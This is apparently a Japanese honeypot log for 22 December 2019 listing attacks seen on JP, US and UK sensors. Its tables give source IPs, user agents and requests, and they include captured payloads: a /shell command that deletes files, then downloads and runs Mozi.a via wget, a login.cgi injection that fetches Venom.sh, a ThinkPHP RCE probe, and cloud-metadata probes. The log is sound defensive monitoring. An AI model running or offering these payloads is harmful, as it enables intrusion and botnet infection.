ハニーポット(仮) 観測記録 2019/12/22分です。
特徴
Location:JP
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
Apache Strustのログイン画面へのスキャン行為
Apache Tomcatの管理画面へのスキャン行為
Drupalのユーザ登録画面へのスキャン行為
WordPressのログイン画面へのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Location:US
Adobe ColdFusionの脆弱性を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Hakai/2.0によるスキャン行為
Apache Tomcatの管理画面へのスキャン行為
Drupalのユーザ登録画面へのスキャン行為
WordPressのログイン画面へのスキャン行為
を確認しました。
Location:UK
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
112[.]124[.]42[.]80に関する不正通信
Apache Tomcatの管理画面へのスキャン行為
WordPressのログイン画面へのスキャン行為
User-AgentがHello, Worldであるアクセス
User-AgentがHello, worldであるアクセス
を確認しました
/shellに対して、ファイルダウンロードおよび実行を狙う以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:46 (前日比:-5)
US:総アクセス数:23 (前日比:-122)
UK:総アクセス数:30 (前日比:+20)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 117.239.149.94 | India |
| 1 | 123.56.87.166 | China |
| 1 | 176.113.161.133 | Ukraine |
| 1 | 178.62.0.153 | United Kingdom |
| 1 | 185.128.41.50 | Switzerland |
| 1 | 202.143.111.228 | Vietnam |
| 1 | 34.66.158.26 | United States |
| 17 | 44.224.22.196 | United States |
| 17 | 44.225.84.206 | United States |
| 1 | 5.196.11.146 | France |
| 1 | 54.147.114.82 | United States |
| 1 | 67.205.150.113 | United States |
| 1 | 89.40.126.224 | Italy |
| 1 | 92.118.37.91 | Romania |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 23 | - |
| 14 | AWS Security Scanner |
| 1 | Cloud mapping experiment. Contact research@pdrlabs.net |
| 1 | Java/1.8.0_131 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
| 1 | GET | /clientaccesspolicy.xml | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http://example[.]com/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | /login/login.do | HTTP/1.1 |
| 2 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /user/register/ | HTTP/1.1 |
| 4 | GET | /wp-login.php | HTTP/1.1 |
| 1 | OPTIONS | / | HTTP/1.0 |
| 1 | POST | /HNAP1/ | HTTP/1.0 |
| 10 | \x16\x03\x01 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 10 | 114.67.80.44 | China |
| 1 | 117.239.149.94 | India |
| 1 | 118.201.132.89 | Singapore |
| 1 | 156.211.249.75 | Egypt |
| 4 | 157.52.156.49 | United States |
| 1 | 178.62.0.153 | United Kingdom |
| 1 | 202.46.29.43 | Indonesia |
| 1 | 41.234.129.163 | Egypt |
| 1 | 41.36.50.219 | Egypt |
| 1 | 69.157.17.80 | Canada |
| 1 | 89.40.126.224 | Italy |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 1 | ApiTool |
| 1 | Go-http-client/1.1 |
| 3 | Hakai/2.0 |
| 1 | Help |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /CFIDE/administrator/ | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | http://www[.]gigablast[.]com/?0.62157622492420108134784200271344 | HTTP/1.1 |
| 1 | GET | http://www[.]gigablast[.]com/?0.7089723585876841424408102556852 | HTTP/1.1 |
| 1 | GET | http://www[.]youdao[.]com/?0.705825174853981151172124644728 | HTTP/1.1 |
| 1 | GET | http://www[.]youdao[.]com/?0.855232108997523597312162961140 | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
| 3 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://185[.]132[.]53[.]119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /user/register/ | HTTP/1.1 |
| 1 | GET | /wp-login.php | HTTP/1.1 |
| 2 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 114.34.34.5 | Taiwan |
| 8 | 118.24.121.69 | China |
| 1 | 134.209.211.69 | United States |
| 1 | 156.221.77.135 | Egypt |
| 1 | 168.0.129.209 | Brazil |
| 1 | 175.5.68.35 | China |
| 4 | 185.142.236.34 | Netherlands |
| 1 | 193.191.148.194 | Belgium |
| 1 | 197.232.1.182 | Kenya |
| 1 | 202.143.111.228 | Vietnam |
| 3 | 220.191.254.66 | China |
| 1 | 27.15.155.174 | China |
| 1 | 35.228.77.202 | United States |
| 1 | 41.216.186.89 | South Africa |
| 1 | 60.191.52.254 | China |
| 2 | 80.82.68.60 | Netherlands |
| 1 | 84.214.55.11 | Norway |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 8 | - |
| 1 | Hakai/2.0 |
| 1 | Hello, world |
| 1 | Hello, World |
| 1 | Help |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
| 8 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
| 1 | python-requests/2.19.1 |
| 1 | User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705 |
| 1 | Vert.x-WebClient/3.8.4 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 2 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | ../../ | HTTP |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://185[.]132[.]53[.]119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ | HTTP/1.1 |
| 2 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 2 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /shell?busybox | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http://192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /v2 | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 2 | GET | /wp-login.php | HTTP/1.1 |
| 1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
| 1 | OPTIONS | / | HTTP/1.0 |
| 1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | \x03 | ||
| 2 | \x16\x03\x01 |
